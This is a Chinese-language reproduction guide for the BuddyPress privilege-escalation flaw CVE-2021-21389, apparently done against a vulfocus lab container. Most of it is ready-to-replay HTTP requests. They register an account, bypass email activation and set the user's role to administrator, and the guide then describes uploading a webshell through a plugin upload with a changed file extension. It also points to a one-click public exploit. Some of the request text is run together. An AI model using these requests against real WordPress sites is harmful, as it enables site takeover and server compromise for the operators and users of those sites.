一、漏洞描述
BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题。
二、影响版本
5.0.0 <BuddyPress< 7.2.1
三、漏洞复现
PS:本次复现使用的是vulfocus/wordpress_cve-2021-21389:latest
0x01、方法一
- 访问镜像地址:http://123.58.224.8:47613/
- 构造payload
POST //wp-json/buddypress/v1/signup HTTP/1.1
Host: ****:47613
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: python-requests/2.24.0
Accept: */*
Content-Type: application/json; charset=UTF-8
Content-Length: 109
{"user_login": "test1121", "user_email": "[email protected]", "user_name": "test1121", "password": "test1121"}
将注册时的activation_key取出来,构造发包,以绕过邮箱验证
PUT //wp-json/buddypress/v1/signup/activate/ysQdW3ClM7UFXILKo6fY6HvsmvyPvKcn``````PUT //wp-json/buddypress/v1/signup/activate/ysQdW3ClM7UFXILKo6fY6HvsmvyPvKcn HTTP/1.1Host: ****:42678Cache-Control: max-age=0Accept-Language: zh-CNUpgrade-Insecure-Requests: 1User-Agent: python-requests/2.24.0Accept: */*Content-Type: application/json; charset=UTF-8Content-Length: 109{"user_login": "test1121", "user_email": "[email protected]", "user_name": "test1121", "password": "test1121"}
新建分组,填完Details后,然后settings默认点击下一步,然后重新进入groups,已经创建成功。
http://******/groups/create/step/group-details/
点开test进入manage下面的members,点击Ban,然后抓包,获取到有效的Cookie和X-WP-Nonce,然后构造发包,替换掉里面的Cookie和X-WP-Nonce,然后获取administrator角色的权限。
POST /wp-json/buddypress/v1/members/me
抓包记录X-WP-Nonce:和Cookie:
替换以下X-WP-Nonce:和Cookie: 然后重放
POST /wp-json/buddypress/v1/members/me HTTP/1.1Host: ****:12607User-Agent: python-requests/2.21.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeX-WP-Nonce: e35e0de589Content-Type: application/json; charset=UTF-8Cookie: csrf_ab39a3=1ecdf739; csrf_8c4f79=b156b1be; csrf_957c5a=cface2f8; csrf_6b71bf=6c0e9317; csrf_8e5be2=89cebc1e; csrf_c5ff2a=dd558828; _ga=GA1.1.1188675309.1720941309; _ga_J1DQF09WZC=GS1.1.1720941333.1.0.1720941333.0.0.0; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_489344b85a8c7a5a56c84c4b6b5258dd=test1121%7C1721219647%7CRG5qc0NcljSkQwceqH1MdCki9vpKAEqaED5O5ses7g9%7C47378454df210bfc2305a11338a597a5a16ab80fe6effc26f5459f2c22d0f453; wp-settings-time-2=1721047705; wordpress_logged_in_765816418d916bdda113ab20c6c87ff6=test1121%7C1721221157%7CCH5do9vqj1ubaMm5iO2xgNa7hGYExgWkyNg1ie4Z6TU%7C5863b7b1265ffa32919477bb24d7f6626fda17483c11838fb603b5593e1a9ceeContent-Length: 26{"roles": "administrator"}
刷新页面已是管理员权限,已经获取到administrator角色的权限可以查看和操作所有模块,我们通过更新plugins,上传shell
抓包修改文件后缀
访问wp-content/uploads/2024/07/(上传的年月)路径下获取已经上传的木马文件
0x02、方法二
使用大佬 HoangKien1020 写的exp 一键利用上传shell GitHub - HoangKien1020/CVE-2021-21389: BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue. - HoangKien1020/CVE-2021-21389https://github.com/HoangKien1020/CVE-2021-21389
  
版权归原作者 張童學 所有, 如有侵权,请联系我们删除。